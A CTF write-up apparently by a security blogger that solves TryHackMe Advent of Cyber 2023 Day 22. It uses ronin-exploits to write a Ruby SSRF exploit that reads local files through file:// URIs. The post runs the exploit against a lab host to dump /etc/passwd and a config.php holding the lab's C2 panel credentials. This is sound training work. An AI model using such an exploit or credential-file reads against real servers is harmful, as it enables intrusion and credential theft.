Solving Advent of Cyber 2023 Day 22 with ronin-exploits
— postmodern
This year I decided to try using Ronin to solve the [Advent of Cyber 2023] challenges. Let’s see how far I can get.
We made it to Day 22 of Advent of Cyber 2023. This challenge involves exploiting
a super simple Server Side Request Forgery (SSRF) vulnerability.
While most SSRF vulnerabilities allow sending HTTP requests to internal
web servers, the instructions hint that you can also send file:// URIs and
request local files. You could solve this challenge only using curl,
but I decided to use ronin-exploits to write a SSRF exploit that requests a
local file.
First we will use the ronin-exploits new command to generate a new web
exploit. We will also enable the Loot mixin
to store the requested files.
$ ronin-exploits new --type web --loot jingle_bells_ssrf.rb
erb exploit.rb.erb jingle_bells_ssrf.rb
chmod jingle_bells_ssrf.rb
Testing the vulnerable /getClientData.php HTTP end-point shows that local
files requested with file:// are returned in the HTTP response body.
Requesting a file that does not exist on the system will result in a HTTP 200
response, but with an empty response body. To send the HTTP request, we will use
the http_get helper method, which accepts a path and additional query
params, sends a HTTP GET request, and returns the HTTP response object.
We will also need to define a file param for the local file we wish to
request via file:// SSRF. Since this is a super simple SSRF exploit,
we will only need to fill in the launch method.
#!/usr/bin/env -S ronin-exploits run -f
require 'ronin/exploits/web'
require 'ronin/exploits/mixins/loot'
module Ronin
module Exploits
class JingleBellsSSRF < Web
include Mixins::Loot
register 'jingle_bells_ssrf'
quality :poc
release_date '2023-12-22'
author "Postmodern", email: "postmodern.mod3@gmail.com"
summary "Advent of Cyber 2023 Day 22"
description <<~DESC
A Basic SSRF exploit for Advent of Cyber 2023 Day 22 aka
"Jingle Your SSRF Bells: A Merry Command & Control Hackventure".
DESC
references [
"https://tryhackme.com/room/adventofcyber2023"
]
param :file, required: true,
desc: 'The path of the local file to request'
def launch
file_uri = "file://#{params[:file]}"
response = http_get('/getClientData.php', query_params: {url: file_uri})
if response.code == '200' && !response.body.empty?
print_success "Got the file!"
loot.add(params[:file],response.body)
else
fail("Failed to request the file: #{params[:file]}")
end
end
end
end
end
Now that our exploit is written, let’s run it!
$ ./jingle_bells_ssrf.rb -p base_url=http://10.10.108.219 -p file=/etc/passwd
>>> Running exploit jingle_bells_ssrf ...
[+] Got the file!
>>> Exploit found the following loot:
/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
We have successfully exploited the SSRF vulnerability and achieved local file
read access. The challenge instructions hints that we should try requesting
config.php from the /var/www/html/ directory, which may contain the C2
panel’s credentials.
$ ./jingle_bells_ssrf.rb -p base_url=http://10.10.108.219 -p file=/var/www/html/config.php
>>> Running exploit jingle_bells_ssrf ...
[+] Got the file!
>>> Exploit found the following loot:
/var/www/html/config.php:
<?php
$username = "mcgreedy";
$password = "mcgreedy!@#$%";
?>
Jack pot!
As you can see, ronin-exploits makes it easy to write SSRF exploits and exfiltrate files.